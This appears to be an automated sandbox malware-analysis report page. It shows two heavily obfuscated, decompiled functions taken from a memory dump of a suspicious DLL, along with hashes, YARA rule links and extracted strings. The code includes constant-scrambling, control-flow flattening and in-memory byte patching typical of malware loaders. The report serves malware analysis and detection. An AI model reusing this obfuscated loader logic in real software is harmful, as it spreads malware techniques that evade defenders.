Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: T)$&E$G<$Qob$URi$`QF$mm$n[1$o7$w5${;[
API String ID: 0-1763375246
Opcode ID: 439bed9769a451e870038c6ee84e4befb2c0bc8e7b0fac74ee3b20c447f657af
Instruction ID: 85d28c50e49d31d025eab01181d81df82fda01063aa252d7903ced9ee83e2d15
Opcode Fuzzy Hash: 439bed9769a451e870038c6ee84e4befb2c0bc8e7b0fac74ee3b20c447f657af
Instruction Fuzzy Hash: 6022127150D3809FD3B9CF61C94AA9BBBE1FBC5708F10891CE29A96260D7B18949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 00875779, Relevance: 12.9, Strings: 10, Instructions: 430
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E00875779(intOrPtr* __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v32;
				void* _v44;
				intOrPtr _v48;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v88;
				char _v92;
				char _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				unsigned int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				unsigned int _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				unsigned int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				unsigned int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				signed int _v268;
				signed int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				void* _t410;
				void* _t455;
				void* _t464;
				intOrPtr _t469;
				void* _t475;
				intOrPtr* _t477;
				void* _t479;
				signed int _t492;
				signed char* _t519;
				signed int _t522;
				signed int _t523;
				signed int _t524;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t528;
				signed int _t529;
				signed int _t530;
				signed int _t531;
				signed char* _t532;
				intOrPtr _t533;
				intOrPtr _t534;
				void* _t535;
				signed char* _t536;
				intOrPtr* _t537;
				signed int* _t539;
				signed int* _t541;
				void* _t543;

				_t477 = _a12;
				_push(_t477);
				_push(_a8);
				_t533 = __edx;
				_t537 = __ecx;
				_push(_a4);
				_v104 = __edx;
				_push(__edx);
				_push(__ecx);
				E0087FE29(_t410);
				_v48 = 0xc2c967;
				_v108 = _v108 & 0x00000000;
				asm("stosd");
				_t539 =  &(( &_v288)[5]);
				_t479 = 0x2d8a01e;
				asm("stosd");
				asm("stosd");
				_v268 = 0x13192e;
				_v268 = _v268 >> 0xe;
				_t522 = 0x7a;
				_v268 = _v268 / _t522;
				_v268 = _v268 ^ 0xa67107cf;
				_v268 = _v268 ^ 0xa67107cf;
				_v180 = 0x822106;
				_v180 = _v180 ^ 0x7b43f696;
				_v180 = _v180 ^ 0xd3ff461a;
				_v180 = _v180 ^ 0xa83e91ca;
				_v260 = 0xfc96b3;
				_v260 = _v260 ^ 0x88d779ee;
				_v260 = _v260 | 0x0ca97313;
				_v260 = _v260 ^ 0xca187f30;
				_v260 = _v260 ^ 0x46b3802f;
				_v288 = 0x4333cc;
				_v288 = _v288 << 0xf;
				_t523 = 0x34;
				_v288 = _v288 / _t523;
				_v288 = _v288 >> 3;
				_v288 = _v288 ^ 0x005b8977;
				_v136 = 0xc5dc93;
				_v136 = _v136 * 0xc;
				_v136 = _v136 ^ 0x0945f62e;
				_v128 = 0x6b700a;
				_t57 =  &_v128; // 0x6b700a
				_v128 =  *_t57 * 0x15;
				_v128 = _v128 ^ 0x08d49145;
				_v232 = 0xf79846;
				_v232 = _v232 ^ 0xca57ef9e;
				_v232 = _v232 ^ 0x925d174a;
				_v232 = _v232 ^ 0x58faffd4;
				_v280 = 0xd1aac6;
				_v280 = _v280 >> 0xc;
				_v280 = _v280 >> 3;
				_v280 = _v280 | 0xe15f3d77;
				_v280 = _v280 ^ 0xe1581caf;
				_v204 = 0x586478;
				_v204 = _v204 << 6;
				_v204 = _v204 * 0x45;
				_v204 = _v204 ^ 0xf4c06de0;
				_v236 = 0x7a6b49;
				_v236 = _v236 + 0xfffff53d;
				_v236 = _v236 + 0xffff6bfb;
				_v236 = _v236 ^ 0x00796dc4;
				_v164 = 0x73b924;
				_v164 = _v164 * 0x37;
				_v164 = _v164 ^ 0x18d89939;
				_v140 = 0xd61f2b;
				_v140 = _v140 | 0xe12df20d;
				_v140 = _v140 ^ 0xe1fed234;
				_v264 = 0xb74ee;
				_v264 = _v264 | 0x369c0611;
				_v264 = _v264 + 0xffffce97;
				_v264 = _v264 | 0x56131c90;
				_v264 = _v264 ^ 0x76993c7a;
				_v188 = 0x86359d;
				_v188 = _v188 | 0xee9d04be;
				_v188 = _v188 >> 7;
				_v188 = _v188 ^ 0x01d63d7e;
				_v196 = 0x62a6bf;
				_v196 = _v196 ^ 0x13f7b83b;
				_v196 = _v196 | 0xfa5dbf29;
				_v196 = _v196 ^ 0xfbd613bb;
				_v272 = 0x497fb9;
				_v272 = _v272 >> 8;
				_v272 = _v272 + 0x46f;
				_t524 = 0x15;
				_v272 = _v272 / _t524;
				_v272 = _v272 ^ 0x0006a64c;
				_v284 = 0x22ff47;
				_v284 = _v284 << 9;
				_v284 = _v284 + 0x2a7e;
				_v284 = _v284 | 0xa3b8d71b;
				_v284 = _v284 ^ 0xe7f75fc1;
				_v168 = 0x5effde;
				_v168 = _v168 << 0xd;
				_v168 = _v168 ^ 0xdff336ff;
				_v160 = 0x143f18;
				_v160 = _v160 >> 8;
				_v160 = _v160 ^ 0x00026d5e;
				_v212 = 0x56f8ef;
				_t525 = 0x74;
				_v212 = _v212 / _t525;
				_v212 = _v212 >> 1;
				_v212 = _v212 ^ 0x00041781;
				_v184 = 0x78f661;
				_t526 = 0x24;
				_v184 = _v184 / _t526;
				_v184 = _v184 << 6;
				_v184 = _v184 ^ 0x00d4b0ae;
				_v132 = 0xfc57e1;
				_v132 = _v132 + 0x95ac;
				_v132 = _v132 ^ 0x00fd4e4f;
				_v224 = 0x75249d;
				_v224 = _v224 >> 2;
				_v224 = _v224 << 5;
				_v224 = _v224 ^ 0x03a0d1e2;
				_v200 = 0x1dd68f;
				_t527 = 0x1e;
				_v200 = _v200 / _t527;
				_v200 = _v200 << 5;
				_v200 = _v200 ^ 0x001cc6a7;
				_v192 = 0xfcdaf1;
				_v192 = _v192 + 0xd795;
				_v192 = _v192 >> 9;
				_v192 = _v192 ^ 0x00058c90;
				_v216 = 0xbb9259;
				_t528 = 0x34;
				_v216 = _v216 / _t528;
				_t529 = 0x52;
				_v216 = _v216 * 0x13;
				_v216 = _v216 ^ 0x004a95ed;
				_v276 = 0x57a41b;
				_v276 = _v276 ^ 0xd020dbe5;
				_v276 = _v276 | 0x8ab5e016;
				_v276 = _v276 + 0xffff22d9;
				_v276 = _v276 ^ 0xdaf55aee;
				_v244 = 0x1f39e;
				_v244 = _v244 >> 7;
				_v244 = _v244 | 0x3f4cee99;
				_v244 = _v244 / _t529;
				_v244 = _v244 ^ 0x00c55e53;
				_v208 = 0x8cb9ec;
				_v208 = _v208 ^ 0x591dda69;
				_v208 = _v208 + 0xffff44b3;
				_v208 = _v208 ^ 0x5993fa0d;
				_v152 = 0xb0343f;
				_v152 = _v152 << 0xf;
				_v152 = _v152 ^ 0x1a1cc008;
				_v252 = 0xe1a21c;
				_v252 = _v252 | 0x952b17c7;
				_v252 = _v252 >> 0xb;
				_v252 = _v252 + 0x3107;
				_v252 = _v252 ^ 0x00168178;
				_v176 = 0x1f45f4;
				_v176 = _v176 + 0xffffb6c3;
				_v176 = _v176 >> 3;
				_v176 = _v176 ^ 0x000294fa;
				_v144 = 0xd98b7;
				_v144 = _v144 + 0xdfca;
				_v144 = _v144 ^ 0x00064cf8;
				_v124 = 0xf97c3c;
				_v124 = _v124 << 0xe;
				_v124 = _v124 ^ 0x5f01afd1;
				_v220 = 0xbf67e3;
				_v220 = _v220 >> 0xf;
				_v220 = _v220 >> 8;
				_v220 = _v220 ^ 0x0002d002;
				_v148 = 0xfa1be7;
				_v148 = _v148 * 0x4c;
				_v148 = _v148 ^ 0x4a419838;
				_v228 = 0xe7473d;
				_v228 = _v228 + 0x3507;
				_v228 = _v228 ^ 0x00ead38c;
				_v156 = 0x66a8ab;
				_v156 = _v156 | 0x79d54c9c;
				_v156 = _v156 ^ 0x79fe3884;
				_v240 = 0x18be1a;
				_v240 = _v240 ^ 0x7e543587;
				_v240 = _v240 * 0x68;
				_v240 = _v240 | 0xe3fcfdd3;
				_v240 = _v240 ^ 0xeff94d70;
				_v172 = 0x9913c4;
				_v172 = _v172 * 0x77;
				_v172 = _v172 + 0xffffc63d;
				_v172 = _v172 ^ 0x47206855;
				_v248 = 0xd44183;
				_v248 = _v248 + 0xd298;
				_v248 = _v248 << 4;
				_v248 = _v248 ^ 0x50766a5f;
				_v248 = _v248 ^ 0x5d272bff;
				_v256 = 0x31eb30;
				_v256 = _v256 ^ 0xb25f58d4;
				_v256 = _v256 ^ 0x46bb6998;
				_t530 = 0x74;
				_v256 = _v256 / _t530;
				_v256 = _v256 ^ 0x021c5309;
				while(1) {
					L1:
					_t531 = _v120;
					goto L2;
					do {
						while(1) {
							L2:
							_t543 = _t479 - 0x3286a26;
							if(_t543 > 0) {
								break;
							}
							if(_t543 == 0) {
								E00882B09(_v220, _v116, _v148, _v228);
								_t479 = 0x483cb7c;
								continue;
							}
							if(_t479 == 0xd18f0a) {
								_t455 = E008657B8( *_t477, _v288, _v136,  *((intOrPtr*)(_t477 + 4)), _v128,  &_v32, _v232);
								_t539 =  &(_t539[6]);
								if(_t455 == 0) {
									L33:
									return _v108;
								}
								_t479 = 0x98446cf;
								continue;
							}
							if(_t479 == 0x2686f46) {
								_t534 =  *_t537;
								E00865026(_v184, _v132, _v224, _t534, _v200);
								_t535 = _t534 + _v260;
								E0087C9B0(_v192, _t535, _v216, _v112, _v116, _v276);
								_push(_v152);
								_t536 = _t535 + _v112;
								_t492 = _t531;
								_push(_v208);
								_push(_t536);
								E008671B3(_t492, _v244);
								_t532 =  &(_t536[_t531]);
								_t541 =  &(_t539[0xa]);
								_t519 = _t536;
								if(_t536 >= _t532) {
									L16:
									_push(_t492);
									_push(_t492);
									_t464 = E0087CCA0(0, 0xe);
									_t539 =  &(_t541[4]);
									_t479 = 0x3286a26;
									 *((char*)(_t464 + _t536)) = 0;
									_t533 = _v104;
									goto L1;
								} else {
									goto L13;
								}
								do {
									L13:
									_t492 = _v268;
									if(( *_t519 & 0x000000ff) == _t492) {
										 *_t519 = 0xc3;
									}
									_t519 =  &(_t519[1]);
								} while (_t519 < _t532);
								goto L16;
							}
							if(_t479 == 0x2d8a01e) {
								_t479 = 0xd18f0a;
								continue;
							}
							if(_t479 != 0x3056d50) {
								goto L30;
							}
							_push(_t479);
							_push(_t479);
							_t469 = E0086C5D8(_a4);
							_t539 =  &(_t539[3]);
							 *_t537 = _t469;
							if(_t469 == 0) {
								_t479 = 0x3286a26;
							} else {
								_v108 = 1;
								_t479 = 0x2686f46;
							}
						}
						if(_t479 == 0x34d1508) {
							if(E0086FB8E(_v164,  &_v100,  &_v116, _v140) == 0) {
								_t479 = 0x483cb7c;
								goto L30;
							}
							_t479 = 0x5c08967;
							goto L2;
						}
						if(_t479 == 0x483cb7c) {
							E00882B09(_v156, _v100, _v240, _v172);
							goto L33;
						}
						if(_t479 == 0x5c08967) {
							_push(_t479);
							_push(_t479);
							_t531 = E0087CCA0(_v248, _v256);
							_t539 =  &(_t539[4]);
							_t479 = 0x3056d50;
							_v120 = _t531;
							_a4 = _v180 + _t531 + _v112;
							goto L2;
						}
						if(_t479 != 0x98446cf) {
							goto L30;
						}
						_v92 =  &_v32;
						_v68 =  *_t477;
						_v64 =  *((intOrPtr*)(_t477 + 4));
						_v60 = _t533;
						_v88 = 0x20;
						_t475 = E0086E7DE(_v280, _v204,  &_v92,  &_v100, _v236);
						_t539 =  &(_t539[3]);
						if(_t475 == 0) {
							goto L33;
						}
						_t479 = 0x34d1508;
						goto L2;
						L30:
					} while (_t479 != 0x5241bf8);
					goto L33;
				}
			}

0x00875780
0x0087578a
0x0087578b
0x00875792
0x00875794
0x00875796
0x0087579d
0x008757a4
0x008757a5
0x008757a6
0x008757ab
0x008757bf
0x008757c7
0x008757c8
0x008757cd
0x008757d2
0x008757d5
0x008757d6
0x008757de
0x008757e7
0x008757ec
0x008757f7
0x008757fb
0x008757ff
0x0087580a
0x00875815
0x00875820
0x0087582b
0x00875833
0x0087583b
0x00875843
0x0087584b
0x00875853
0x0087585b
0x00875864
0x00875867
0x0087586b
0x00875870
0x00875878
0x0087588b
0x00875892
0x0087589d
0x008758a8
0x008758b0
0x008758b7
0x008758c2
0x008758ca
0x008758d2
0x008758da
0x008758e2
0x008758ea
0x008758ef
0x008758f4
0x008758fc
0x00875904
0x0087590c
0x00875916
0x0087591a
0x00875922
0x0087592a
0x00875932
0x0087593a
0x00875942
0x00875955
0x0087595e
0x00875969
0x00875974
0x0087597f
0x0087598a
0x00875992
0x0087599a
0x008759a2
0x008759aa
0x008759b2
0x008759ba
0x008759c2
0x008759c7
0x008759cf
0x008759d7
0x008759df
0x008759e7
0x008759ef
0x008759f7
0x008759fc
0x00875a0a
0x00875a0f
0x00875a15
0x00875a1d
0x00875a25
0x00875a2a
0x00875a32
0x00875a3a
0x00875a42
0x00875a4d
0x00875a55
0x00875a60
0x00875a6b
0x00875a73
0x00875a7e
0x00875a8a
0x00875a8f
0x00875a95
0x00875a99
0x00875aa1
0x00875aad
0x00875ab2
0x00875ab8
0x00875abd
0x00875ac5
0x00875ad0
0x00875adb
0x00875ae6
0x00875aee
0x00875af3
0x00875af8
0x00875b00
0x00875b0c
0x00875b11
0x00875b15
0x00875b1a
0x00875b22
0x00875b2a
0x00875b32
0x00875b37
0x00875b41
0x00875b4d
0x00875b52
0x00875b5d
0x00875b60
0x00875b64
0x00875b6c
0x00875b74
0x00875b7c
0x00875b84
0x00875b8c
0x00875b94
0x00875b9c
0x00875ba1
0x00875baf
0x00875bb3
0x00875bbb
0x00875bc3
0x00875bcb
0x00875bd3
0x00875bdb
0x00875be6
0x00875bee
0x00875bf9
0x00875c01
0x00875c09
0x00875c0e
0x00875c16
0x00875c1e
0x00875c29
0x00875c34
0x00875c3c
0x00875c47
0x00875c52
0x00875c5d
0x00875c68
0x00875c73
0x00875c7b
0x00875c86
0x00875c8e
0x00875c93
0x00875c98
0x00875ca0
0x00875cb3
0x00875cba
0x00875cc5
0x00875ccd
0x00875cdd
0x00875ce5
0x00875cf0
0x00875cfb
0x00875d06
0x00875d0e
0x00875d1b
0x00875d1f
0x00875d27
0x00875d2f
0x00875d42
0x00875d49
0x00875d54
0x00875d5f
0x00875d67
0x00875d6f
0x00875d74
0x00875d7c
0x00875d84
0x00875d8c
0x00875d94
0x00875da2
0x00875da5
0x00875da9
0x00875db1
0x00875db1
0x00875db1
0x00875db1
0x00875db8
0x00875db8
0x00875db8
0x00875db8
0x00875dbe
0x00000000
0x00000000
0x00875dc4
0x00875f56
0x00875f5d
0x00000000
0x00875f5d
0x00875dd0
0x00875f26
0x00875f2b
0x00875f30
0x008760a6
0x008760b7
0x008760b7
0x00875f36
0x00000000
0x00875f36
0x00875ddc
0x00875e43
0x00875e59
0x00875e65
0x00875e86
0x00875e8b
0x00875e92
0x00875e99
0x00875e9b
0x00875ea3
0x00875ea4
0x00875ea9
0x00875eab
0x00875eae
0x00875eb2
0x00875ec7
0x00875ee0
0x00875ee1
0x00875ee6
0x00875eeb
0x00875eee
0x00875ef3
0x00875ef7
0x00000000
0x00000000
0x00000000
0x00000000
0x00875eb4
0x00875eb4
0x00875eb4
0x00875ebd
0x00875ebf
0x00875ebf
0x00875ec2
0x00875ec3
0x00000000
0x00875eb4
0x00875de4
0x00875e35
0x00000000
0x00875e35
0x00875dec
0x00000000
0x00000000
0x00875e08
0x00875e09
0x00875e0d
0x00875e12
0x00875e15
0x00875e1a
0x00875e2e
0x00875e1c
0x00875e1c
0x00875e27
0x00875e27
0x00875e1a
0x00875f6d
0x00876067
0x00876073
0x00000000
0x00876073
0x00876069
0x00000000
0x00876069
0x00875f79
0x0087609f
0x00000000
0x008760a5
0x00875f85
0x0087600c
0x0087600d
0x0087601b
0x0087601d
0x00876024
0x0087602b
0x00876039
0x00000000
0x00876039
0x00875f8d
0x00000000
0x00000000
0x00875fa6
0x00875faf
0x00875fb9
0x00875fcf
0x00875fd7
0x00875fe2
0x00875fe7
0x00875fec
0x00000000
0x00000000
0x00875ff2
0x00000000
0x00876078
0x00876078
0x00000000
0x00876084

Strings

w=_, xrefs: 008758F4
xdX, xrefs: 00875904
Uh G, xrefs: 00875D54
~*, xrefs: 00875A2A
_jvP, xrefs: 00875D74
01, xrefs: 00875D84
pk, xrefs: 008758A8
=G, xrefs: 00875CC5
Ikz, xrefs: 00875922
, xrefs: 00875FD7

Memory Dump Source

Source File: 00000000.00000002.703048375.0000000000861000.00000020.00000001.sdmp, Offset: 00860000, based on PE: true

Associated: 00000000.00000002.703041906.0000000000860000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.703166511.0000000000886000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_860000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: pk$ $01$=G$Ikz$Uh G$_jvP$w=_$xdX$~*
API String ID: 0-1860247402
Opcode ID: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction ID: 03d1495537b02f6e6d6b1570f0ee3788b467aff0533b269bb7f500bb60bed942
Opcode Fuzzy Hash: fa76ad5acae243c1c6f25466b63a0bb5d20f34d56f5c0675485de595a933ec53
Instruction Fuzzy Hash: 242232711087809FD768CF25C58AA9BBBE2FFC5708F10891DE6DA96260D7B19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00877D5B, Relevance: 12.9, Strings: 10, Instructions: 361
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E00877D5B(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _t420;
				signed int _t442;
				signed int _t443;
				signed int _t444;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				void* _t488;
				void* _t489;
				signed int* _t493;

				_t493 =  &_v2792;
				_v2792 = 0x289571;
				_v2792 = _v2792 | 0xf6df9bca;
				_v2792 = _v2792 + 0xea43;
				_v2792 = _v2792 ^ 0xf7008a17;
				_v2788 = 0xdb8a78;
				_v2788 = _v2788 * 6;
				_t488 = __ecx;
				_t489 = 0x219adc7;
				_t442 = 0x7a;
				_v2788 = _v2788 / _t442;
				_t443 = 0x42;
				_v2788 = _v2788 * 0x3d;
				_v2788 = _v2788 ^ 0x0296dfb6;
				_v2660 = 0xc0a6c5;
				_v2660 = _v2660 << 6;
				_v2660 = _v2660 ^ 0x3025665c;
				_v2692 = 0x3a8fa3;
				_v2692 = _v2692 ^ 0xa120b079;
				_v2692 = _v2692 | 0x9ac88514;
				_v2692 = _v2692 ^ 0xbbd9167d;
				_v2668 = 0xec1a87;
				_v2668 = _v2668 + 0x8cab;
				_v2668 = _v2668 ^ 0x00e348c2;
				_v2628 = 0xecd9a9;
				_v2628 = _v2628 << 9;
				_v2628 = _v2628 ^ 0xd9bcc0eb;
				_v2756 = 0xbae8da;
				_v2756 = _v2756 + 0xefc;
				_v2756 = _v2756 * 0x2c;
				_v2756 = _v2756 ^ 0x76eb1803;
				_v2756 = _v2756 ^ 0x56c3d905;
				_v2780 = 0x787147;
				_v2780 = _v2780 + 0xffff6597;
				_v2780 = _v2780 + 0xffffc18b;
				_v2780 = _v2780 | 0x826dfd4e;
				_v2780 = _v2780 ^ 0x827371e5;
				_v2712 = 0x74bd84;
				_v2712 = _v2712 >> 9;
				_v2712 = _v2712 + 0xbcb6;
				_v2712 = _v2712 ^ 0x0001f6d9;
				_v2680 = 0x714a85;
				_v2680 = _v2680 | 0x3dc400c8;
				_v2680 = _v2680 ^ 0x3df5425d;
				_v2612 = 0xace488;
				_v2612 = _v2612 | 0xd2617c07;
				_v2612 = _v2612 ^ 0xd2e83d7d;
				_v2736 = 0x9a08fa;
				_v2736 = _v2736 + 0x9c03;
				_v2736 = _v2736 << 5;
				_v2736 = _v2736 ^ 0x135d006f;
				_v2652 = 0x41ccd2;
				_v2652 = _v2652 ^ 0x97b2ef27;
				_v2652 = _v2652 ^ 0x97fb61bc;
				_v2764 = 0x9e119e;
				_v2764 = _v2764 << 2;
				_v2764 = _v2764 | 0x268f2d0f;
				_v2764 = _v2764 / _t443;
				_v2764 = _v2764 ^ 0x009ccc86;
				_v2620 = 0x8f6e28;
				_v2620 = _v2620 >> 3;
				_v2620 = _v2620 ^ 0x00104951;
				_v2772 = 0xe21e14;
				_v2772 = _v2772 + 0xffff5b09;
				_v2772 = _v2772 * 0x18;
				_v2772 = _v2772 + 0xc00a;
				_v2772 = _v2772 ^ 0x152b5515;
				_v2608 = 0x3d3ea7;
				_v2608 = _v2608 + 0x63eb;
				_v2608 = _v2608 ^ 0x0030ec7d;
				_v2644 = 0x866304;
				_v2644 = _v2644 + 0x379c;
				_v2644 = _v2644 ^ 0x008e4788;
				_v2604 = 0xe77a6a;
				_t121 =  &_v2604; // 0xe77a6a
				_t444 = 0x63;
				_v2604 =  *_t121 / _t444;
				_v2604 = _v2604 ^ 0x000e0408;
				_v2696 = 0xf5199c;
				_v2696 = _v2696 << 8;
				_v2696 = _v2696 << 3;
				_v2696 = _v2696 ^ 0xa8c2da1f;
				_v2636 = 0xbfea70;
				_v2636 = _v2636 | 0x60f37e4e;
				_v2636 = _v2636 ^ 0x60f450e6;
				_v2720 = 0x6acbb3;
				_t445 = 0x6c;
				_v2720 = _v2720 / _t445;
				_v2720 = _v2720 >> 9;
				_v2720 = _v2720 ^ 0x00013488;
				_v2704 = 0x72224f;
				_v2704 = _v2704 << 9;
				_v2704 = _v2704 + 0xffff0fb2;
				_v2704 = _v2704 ^ 0xe44ad0e5;
				_v2728 = 0xe68b79;
				_v2728 = _v2728 | 0x8e61462a;
				_v2728 = _v2728 >> 1;
				_v2728 = _v2728 ^ 0x477bf727;
				_v2616 = 0x4099b0;
				_v2616 = _v2616 + 0xfa8f;
				_v2616 = _v2616 ^ 0x0048c0a5;
				_v2688 = 0xff8ffd;
				_v2688 = _v2688 ^ 0x53972d47;
				_t446 = 0x60;
				_v2688 = _v2688 / _t446;
				_v2688 = _v2688 ^ 0x00dac0dc;
				_v2744 = 0xc2c855;
				_v2744 = _v2744 | 0x821d7436;
				_t447 = 0x65;
				_v2744 = _v2744 * 0x46;
				_v2744 = _v2744 ^ 0xc93dde39;
				_v2664 = 0x8fcf69;
				_v2664 = _v2664 ^ 0x92a1f028;
				_v2664 = _v2664 ^ 0x922e5d56;
				_v2672 = 0x138bb7;
				_v2672 = _v2672 + 0xffff6c98;
				_v2672 = _v2672 ^ 0x001bead2;
				_v2784 = 0x1d404b;
				_v2784 = _v2784 ^ 0xbb38c348;
				_v2784 = _v2784 >> 0xb;
				_v2784 = _v2784 | 0xeccea58e;
				_v2784 = _v2784 ^ 0xecdc694e;
				_v2676 = 0xbdcffc;
				_v2676 = _v2676 ^ 0x5aef785e;
				_v2676 = _v2676 ^ 0x5a57f2e1;
				_v2768 = 0xceb2dd;
				_v2768 = _v2768 | 0xafbcd5ba;
				_v2768 = _v2768 * 0xf;
				_v2768 = _v2768 / _t447;
				_v2768 = _v2768 ^ 0x00c1507c;
				_v2732 = 0xba5c67;
				_v2732 = _v2732 + 0xffff3085;
				_v2732 = _v2732 ^ 0x29fec498;
				_v2732 = _v2732 ^ 0x29414316;
				_v2740 = 0xfebc70;
				_v2740 = _v2740 >> 6;
				_t448 = 0x4c;
				_v2740 = _v2740 * 0x46;
				_v2740 = _v2740 ^ 0x01107382;
				_v2776 = 0x1fdbbd;
				_v2776 = _v2776 + 0xffff7a05;
				_v2776 = _v2776 << 5;
				_v2776 = _v2776 + 0xffff7a3d;
				_v2776 = _v2776 ^ 0x03eed3d9;
				_v2708 = 0xe5e896;
				_v2708 = _v2708 << 6;
				_v2708 = _v2708 + 0x807d;
				_v2708 = _v2708 ^ 0x3973facc;
				_v2716 = 0xdc1d9;
				_v2716 = _v2716 | 0xfc1937aa;
				_v2716 = _v2716 + 0xffffd03c;
				_v2716 = _v2716 ^ 0xfc1f97ce;
				_v2648 = 0xeb72b6;
				_v2648 = _v2648 >> 8;
				_v2648 = _v2648 ^ 0x0003133b;
				_v2724 = 0x35c70c;
				_v2724 = _v2724 + 0xffff3120;
				_v2724 = _v2724 + 0xda65;
				_v2724 = _v2724 ^ 0x003bd395;
				_v2656 = 0x588c44;
				_v2656 = _v2656 ^ 0x3c8fee8a;
				_v2656 = _v2656 ^ 0x3cdfb996;
				_v2632 = 0xa98095;
				_v2632 = _v2632 + 0xf08e;
				_v2632 = _v2632 ^ 0x00ab49e1;
				_v2640 = 0x908171;
				_v2640 = _v2640 << 0xa;
				_v2640 = _v2640 ^ 0x42069508;
				_v2748 = 0xf99537;
				_v2748 = _v2748 >> 9;
				_v2748 = _v2748 | 0x4d3f7029;
				_v2748 = _v2748 ^ 0x4d356fb4;
				_v2700 = 0xf7c115;
				_v2700 = _v2700 + 0xffffc630;
				_v2700 = _v2700 >> 5;
				_v2700 = _v2700 ^ 0x0003a618;
				_v2624 = 0xf73d89;
				_v2624 = _v2624 * 0x3f;
				_v2624 = _v2624 ^ 0x3cd41ae8;
				_v2684 = 0x237d3e;
				_v2684 = _v2684 + 0xffff7bf2;
				_v2684 = _v2684 << 0xb;
				_v2684 = _v2684 ^ 0x17c7121d;
				_v2752 = 0x3823b3;
				_v2752 = _v2752 * 0x2a;
				_v2752 = _v2752 + 0xffff9ab5;
				_v2752 = _v2752 >> 9;
				_v2752 = _v2752 ^ 0x0000d6a9;
				_v2760 = 0x9d905;
				_t420 = _v2760 / _t448;
				_v2760 = _t420;
				_v2760 = _v2760 + 0xffff5226;
				_v2760 = _v2760 ^ 0x58f88d53;
				_v2760 = _v2760 ^ 0xa70b0c4e;
				while(_t489 != 0x219adc7) {
					if(_t489 == 0x472b880) {
						E00861A34(_v2744,  &_v1040, _t448, _t448, _v2664, _v2672, _v2784, _t448, _v2792, _v2676);
						_push(_v2776);
						_push(_v2740);
						_push(_v2732);
						E00882D0A(_v2716, __eflags,  &_v2080, _v2648, _v2724, _v2656, 0x86196c,  &_v520,  &_v1040, E0087E1F8(0x86196c, _v2768, __eflags));
						E0087FECB(_t422, _v2632, _v2640, _v2748, _v2700);
						__eflags = 0;
						return E008785FF(_v2624, _v2684, 0, 0,  &_v520, 0, _v2752, 0, _v2760);
					}
					_t501 = _t489 - 0x6430241;
					if(_t489 != 0x6430241) {
						L7:
						__eflags = _t489 - 0xc99ad3;
						if(__eflags != 0) {
							continue;
						} else {
							return _t420;
						}
						L10:
						return _t420;
					}
					E00880DB1(_v2788,  &_v2600, _t501, _v2660, _t448, _v2692);
					 *((short*)(E008709DD(_v2668,  &_v2600, _v2628, _v2756))) = 0;
					E0086BAA9(_v2780, _v2712, _t501, _v2680, _v2612,  &_v1560);
					_push(_v2620);
					_push(_v2764);
					_push(_v2652);
					E00882D0A(_v2608, _t501,  &_v1560, _v2644, _v2604, _v2696, 0x86188c,  &_v2080,  &_v2600, E0087E1F8(0x86188c, _v2736, _t501));
					E0087FECB(_t434, _v2636, _v2720, _v2704, _v2728);
					_t448 = _v2616;
					_t420 = E0086BFBE( &_v2080, _t488, _v2688);
					_t493 =  &(_t493[0x18]);
					if(_t420 != 0) {
						_t489 = 0x472b880;
						continue;
					}
					goto L10;
				}
				_t489 = 0x6430241;
				goto L7;
			}

0x00877d5b
0x00877d61
0x00877d6a
0x00877d71
0x00877d78
0x00877d7f
0x00877d90
0x00877d94
0x00877d9a
0x00877da1
0x00877da6
0x00877db1
0x00877db2
0x00877db6
0x00877dbe
0x00877dc9
0x00877dd1
0x00877ddc
0x00877de4
0x00877dec
0x00877df4
0x00877dfc
0x00877e07
0x00877e12
0x00877e1d
0x00877e28
0x00877e30
